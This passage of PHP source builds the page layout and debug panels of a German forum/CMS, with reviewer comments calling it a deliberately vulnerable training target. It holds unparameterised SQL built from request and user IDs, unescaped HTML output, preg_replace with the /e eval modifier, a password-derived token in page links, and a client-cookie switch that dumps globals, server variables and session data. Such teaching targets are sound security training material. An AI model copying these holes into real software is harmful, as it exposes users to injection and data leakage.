<a title='Session-Variabeln Löschen/Anlegen' href='$self/set?' onclick='return(a=prompt(\"Bitte geben Sie ein Session-Wert ein! (key=value)\",\"\"))?this.href+=a:false'$rel$sel>Set Session</a> /
<a title='Nochmal Schreibzugriff versuchen!' href='$self/write'$rel$sel>WriteTest</a></small>".((isset($addon) and $addon)
? preg_replace('/\$\w+/e','@$0',"<li><a class='wipe' href='$wiki/Add-on'$tgb>Addon Funktionen</a>: <small>".$addon."</small>") : "")."</li></ul>
</fieldset></td></tr></table><div class='cr'>".@preg_replace(array_keys($creole),array_values($creole),$val)."</div>" : "") : "");
# Layout
# Builds the complete HTML page around the body collected in $out so far: document head
# (robots, auto-refresh, feed links, CSS), title bar, breadcrumb, menu, the jsdebug()
# helper, the previous $out passed through strtr($out,$uml), and the footer.
# NOTE(review): $uid, $mid and trim($request) are interpolated into SQL text, and $title,
# $request, $line[username] and similar values into HTML, with no escaping visible in this
# statement. Whether they are validated earlier cannot be seen from here. The config header
# marks this forum as a deliberately vulnerable training target ($leak), so read every
# interpolation below as a spot where a production application would need bound parameters
# or context-aware output encoding.
// User row (id, username, password) for the logged-in user, false for guests.
// reset() takes the first element of whatever $sql['aq'] returns (presumably a list of rows).
$line = ($uid) ? reset(($sql['aq']($conn,"select id,username,password from [user] where id=$uid"))) : false;
$out = "<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'>
<html><head><title>$title</title>
<meta name='robots' content='".(($craw) ? "all" : "noindex, nofollow")."'>\n<meta name='viewport' content='width=device-width, initial-scale=1' />"
.(($uid and $request != 'Chat' and !isset($_COOKIE['login'])) ? "\n<meta http-equiv='refresh' content='".(($eos+1)*60)."; URL=$self'>" : "")."
<meta http-equiv='content-type' content='text/html; charset=utf-8' />\n"
.(($icon) ? "<link href='$icon' rel='shortcut icon' />" : "")
// Atom feed link: for a logged-in user the URL carries "$uid." followed by $hash[0]() of
// "username:password" taken from the user row above.
// NOTE(review): that token is derived from the stored password column and is written into
// the page source as part of a URL; $hash[0] is defined elsewhere - confirm what it is.
.((!$local and !$inet and !$uid) ? "" : "<link rel='alternate' type='application/atom+xml' href='$self/Atom".(($uid) ? "?id=$uid.".$hash[0]("$line[username]:$line[password]") : '')."' title='Forumfeed".(($uid) ? " für $line[username]" : "")."' />\n")
.(($uedit) ? "<link rel='alternate' title='Inhalt Bearbeiten' href='$self/$uedit' type='application/x-wiki' />" : '')
.(($mid) ? "<link rel='alternate' type='application/atom+xml' href='$self/Atom/Blog/".($val = $sql['sq']($conn,"select username from user where id = $mid"))."' title='Blogfeed".(($uid) ? " von $val" : "")."' />\n" : "")
.(($css) ? "<link type='text/css' rel='stylesheet' href='$css' />\n"
: "<style type='text/css'><!-- .cr pre,.cr ol,.cr ul,.cr dl,.cr blockquote{margin-top:0;margin-bottom:0}.cr h1,.cr h2,.cr h3,.cr h4,.cr h5,.cr h6 {margin-top:0}.cr ol{padding-left:30}.cr ul{padding-left:20}.cr dt{font-weight:bold}.tl{margin-bottom:0;clear:both}.wipe{color:navy}.file{color:maroon}.self,.home{color:green}.anchor{color:darkgreen}.leak{color:red}.title{text-shadow:black 2px 1px 4px;font-size:2.5em;color:$stc;margin-top:0;margin-bottom:0}.shl{background-color:yellow}#debug ol{font-size:0.8em}--></style>\n")
.(($head) ? implode("\n",$head)."\n" : '')."</head><body>".(($logo) ? "<a href='$self'><img src='$logo' align='right' alt='Logo' title='$title' border='0' /></a>" : "")."
<h1 class='title'>$title</h1><table width='100%'><tr><td><a href='$self'>Startseite</a>"
.(($sql and $content and $status/2%2) ? " / <a href='$self/CMS'>CMS</a>" : "")
// Breadcrumb for the current request; only emitted when $request consists of word
// characters, dots and dashes, optionally followed by one whitespace character.
.((preg_match('/^([\w.-]+)\s?$/',$request,$var)) ? " / <a href='$self/$var[1]'>$var[1]</a>" : "")
.(($sql and $request == 'CMS' and isset($_GET['id']) and $id and count($_POST)) ? " <small><a href='#edit'>(edit)</a></small>" : "")
.(($sql and $content and ($status/2%2 or $status%4 == 1 and $sql['sq']($conn,"select status/2%4 from [cms] where name like '".trim($request)."'") >= 2 )) ? " <small><a href='$self/CMS?q=$request'>(edit)</a></small>"
: (($path and $mid and preg_match("!^/$request/([\w.-]+)$!",$path,$var)) ? " / <a href='$self/Profil/$var[1]'>$var[1]</a>" : ''))
// Menu: every entry becomes a link whose href is the whole entry and whose label is its
// first run of word characters; duplicates are dropped and the links joined with " | ".
."</td><td align='right'>".implode(' | ',array_unique(preg_replace('/(\w+).*/',"<a href='$self/$0'>$1</a>",
(($sql and ($local or $inet or $uid)) ? array_merge((array)$sql['sq']($conn,"select name from [cms] where name like '_%' and status%2 = 1 and status/2%4 <= ".($status/2%2 + $status%2*2)." order by name"),
((is_array($content)) ? array_keys($content) : array()),
(($uid and $status/2%2 and !$sql['sq']($conn,'select count(*) from forum where status is not null and mailid is not null')) ? array('CMS') : array()),
(($imps or $uid and $status/2%2) ? array('Impressum') : array()),
(($user and !$lone) ? array('Mitglieder') : array()),
(($var = $sql['aq']($conn,"
select count(*),count(b.id)
from forum as a
left join forum as b on a.id = b.id and ".(($uid) ? "b.userid = $uid" : "b.id is null")."
where a.mailid = a.userid and a.status is not null".(($uid) ? "" : " and a.status%2 = 0")) and $var[0][0]) ? array("Blog".(($var[0][1]) ? "/$line[username]" : "")) : array()),
array("Suche?$getopt")) : array('Impressum'))))).((isset($_SESSION['uid']) and $uid) ? (($request == 'Chat' or $status%2 and $sql['sq']($conn,"
select count(*)
from user
where status%2 = 1 and id != $uid")) ? " | <a href='$self/Chat'>Chat</a>" : '')." | <a href='$self/Datei'>Datei</a>".(($sql['sq']($conn,"
select count(*)
from forum
where mailid != userid and (userid = $uid or mailid = $uid)")) ? " | <a href='$self/Mail'>Mail</a>".preg_replace('!(\d+)(?=/)!',"<strong style='color:red'>\$1</strong>",(($var = $sql['sq']($conn,"
select ifnull(nullif(count(*)-count(r.id),0)||'/','')||count(*)
from [forum] as f
left join [forum] as r on r.id = f.id and r.status/2%2 = 1
where f.status is not null and f.mailid = $uid and f.mailid != f.userid")) ? " ($var)" : "")) : '')." | <a href='$self/Profil/".($val = ucfirst($line['username']))."'>Profil von $val</a> | <a href='$self/Abmelden'>Abmelden</a>" : '')."</td></tr></table><hr />
<script type='text/javascript'><!--\n".preg_replace($js,'',((($leak or $status/2%2) and isset($_COOKIE['debug']) and $_COOKIE['debug']) ? "
document.write(\"<input type='hidden' id='jspredebug' \/>\");
jsdebug = function() { // Debug-Helper
x = [arguments[0],new Date().toLocaleString().replace(/^.*?(\d+:\d+(?::\d+)).*?$/,'$1') + ':'];
x[1] += x[0];
if((x[2] = x[0].line) || (x[2] = x[0].lineNumber)) // Zeilennummer Ermitteln
x[1] += '\\x20(Line\\x20' + x[2] + ')';
if((x[2] = x[0].stack)) // Verbose Error-String
x[1] += '\\n' + x[2];
if((x[2] = document.getElementById('jsconsole')) && (x[3] = document.getElementById('jsdebugswitch')) && x[3].checked || (x[2] = document.getElementById('jspredebug'))) {
x[2].value += x[1] + '\\n';
x[2].scrollTop = x[2].scrollHeight;
if(x[2].style.display == 'none')
x[2].style.display = 'block';
}
else" : " jsdebug = function() {")."
if(typeof console != 'undefined')
console.log(arguments[0]);
return arguments[0];
};")."//--></script>".preg_replace('/(?<!<!---->)$/',"<br clear='all' />",strtr($out,$uml))
."<hr /><div align='right'><address onDblClick='location.href=\"$self\"'><small>© $date by $author</small></address></div>";
# Close the database handle now that the page has been assembled
if($sql && $conn) {
	$sql['cl']($conn);
}
# Debug output
# Appends the debug panels to $out. The outer condition needs $leak or the $status/2%2 bit
# (the trailing "$leak === 1" adds nothing, a truthy $leak already passes) plus one trigger:
# no database handle while $debug is set, a request for "Debug", or a truthy "debug" cookie.
# NOTE(review): the "debug" cookie is supplied by the client, so with $leak enabled any
# visitor can switch these panels on. $status/2%2 is presumably the administrator bit - confirm.
# Each panel is hidden when its bit in the client-supplied "hide" cookie is set.
if(($leak or $status/2%2 or $leak === 1) and (!$sql and isset($debug) or $request == 'Debug' or isset($_COOKIE['debug']) and $_COOKIE['debug'])) {
// Toggle: requesting "Debug" while the cookie is set writes it with expiry time()-$ctl
// (presumably in the past, i.e. switches debugging off); without the cookie, and with a
// database handle, a session cookie debug=1 is set.
if(isset($_COOKIE['debug']) and $_COOKIE['debug']) {
if($request == 'Debug')
setcookie('debug',0,time()-$ctl,$self);
}
elseif($sql)
setcookie('debug',1,0,$self);
// Debug console, written client-side with document.write. Text buffered in the hidden
// "jspredebug" field is appended to the console textarea when the logging switch is
// checked; the hidden field is removed afterwards.
$out .= "<script type='text/javascript'><!--\n".preg_replace($js,'',"document.write(\"<small><a href='#' onclick='"
.strtr(preg_replace($jshide[0],$jshide[1],"debugconsole,3"),array('\\' => '\\\\', '"' => '\"'))
."'>Debug-Console<\/a><\/small><input type='checkbox' id='jsdebugswitch' title='Loggen ein\/ausschalten'".((isset($_COOKIE['hide']) and $_COOKIE['hide']/(1<<3)%2) ? '' : " checked")
." \/>\\x20|\\x20<div id='debugconsole'".((isset($_COOKIE['hide']) and $_COOKIE['hide']/(1<<3)%2) ? " style='display:none'" : '')
."><textarea cols='80' rows='10' style='width:100%;display:none' ondblclick='this.value=String();this.style.display=/none/.source' id='jsconsole' readonly><\/textarea><\/div>\");
x = document.getElementById('jspredebug');
if((y=document.getElementById('jsdebugswitch')) && y.checked) {
y = document.getElementById('jsconsole');
if(y.value += x.value)
y.style.display = 'block';
}
x.parentNode.removeChild(x);//--></script>");
// "=" binds tighter than "and"/"or": $var is true only in "$leak === 1" mode with a GLOBALS
// query parameter, and then the whole $GLOBALS array is dumped instead of $debug.
// $val receives error_get_last() only when none of the earlier alternatives matched.
// NOTE(review): the dump goes through strtr(..., $html); $html is defined elsewhere and is
// presumably an HTML-escaping map - confirm. The PHP error line interpolates $val[message]
// without that map.
if($var = ($leak === 1 and isset($_GET['GLOBALS'])) or isset($debug) or isset($sql['log']) or function_exists('error_get_last') and $val = error_get_last())
$out .= "<a href='#' onclick='".preg_replace($jshide[0],$jshide[1],"debug,4")."'><small>Debuginfos:</small></a> | <div"
.((isset($_COOKIE['hide']) and $_COOKIE['hide']/(1<<4)%2) ? " style='display:none'" : '')." id='debug'>"
.(($val and is_array($val) and isset($val['message'])) ? "<b>PHP-Fehler:</b> $val[message] in $val[file] on line $val[line]<br>" : '')
.(($var or isset($debug) and $debug) ? "<pre style='white-space:pre-wrap'>".preg_replace('/^\w+\s+\(|\)$/','',strtr(print_r((($var) ? $GLOBALS : $debug),true),$html))."</pre>" : "")
.((isset($sql['log'])) ? $sql['log'] : "")."</div>";
// Only session keys matching $dpsk (all keys in "$leak === 1" mode) are copied into
// $__SESSION; the table below prints that filtered copy, not $_SESSION itself.
if(isset($_SESSION)) // Do not show foreign session data
foreach($_SESSION as $key => $var)
if(preg_match($dpsk,$key) or $leak === 1)
$__SESSION[$key] = $var;
// Add entries for newline and space to the $html translation map used for the table cells.
$html = array_merge($html,array("\n" => "<br />", " " => " "));
// One table cell per non-empty request array: ${"_$var"} resolves to $_GET, $_POST, $_FILES,
// $_COOKIE and the filtered $__SESSION. Underscores are stripped from the cell header, so
// the last one is labelled SESSION. Empty or unset arrays are dropped from $val.
$val = array('GET','POST','FILES','COOKIE','_SESSION');
foreach($val as $key => $var)
if(isset(${"_$var"}) and count(${"_$var"}) > 0)
$val[$key] = str_replace('_','',"<td valign='top'><b><a href='#' onclick='".preg_replace($jshide[0],$jshide[1],"$var,".(5+$key))."'>$var</a></b><br /><small id='$var'".((isset($_COOKIE['hide']) and $_COOKIE['hide']/(1<<(5+$key))%2) ? " style='display:none'" : '').">").strtr(print_r(${"_$var"},true),$html).'</small></td>';
else
unset($val[$key]);
// HTTP header panel: only the HTTP_*, REMOTE_*, REQUEST_*, REDIRECT_* and *_INFO / *_URI /
// *_URL entries of $_SERVER are listed, unless "$leak === 1", which lists all of $_SERVER.
$row = array();
foreach($_SERVER as $key => $var)
if(preg_match('/^(HTTP|RE(MOTE|QUEST|DIRECT))_|_(INFO|UR[IL])$/',$key) or $leak === 1)
$row[$key] = $var;
ksort($row);
$out .= "<a href='#' onclick='".preg_replace($jshide[0],$jshide[1],"dinfo,11")."'><small>Debug-Tabelle:</small></a><table width='100%' border='1' id='dinfo'".((isset($_COOKIE['hide']) and $_COOKIE['hide']/(1<<11)%2) ? " style='display:none'" : '')."><tr>".((count($val) > 0) ? implode('',$val)."</tr><tr><td valign='top' colspan='".count($val)."'>" : '<td>')
."<b><a href='#' onclick='".preg_replace($jshide[0],$jshide[1],"http,10")."'>HTTP Header</a></b><br /><small id='http'".((isset($_COOKIE['hide']) and $_COOKIE['hide']/(1<<10)%2) ? " style='display:none'" : '').">".strtr(print_r($row,true),$html)."</small></td></tr></table>";
}
# End of Line
# Declare the response as UTF-8 HTML, emit the finished page and terminate the script.
# "@" suppresses any warning header() would raise (for example when output was already sent).
@header('Content-Type: text/html; charset=UTF-8');
exit("$out</body></html>");
?>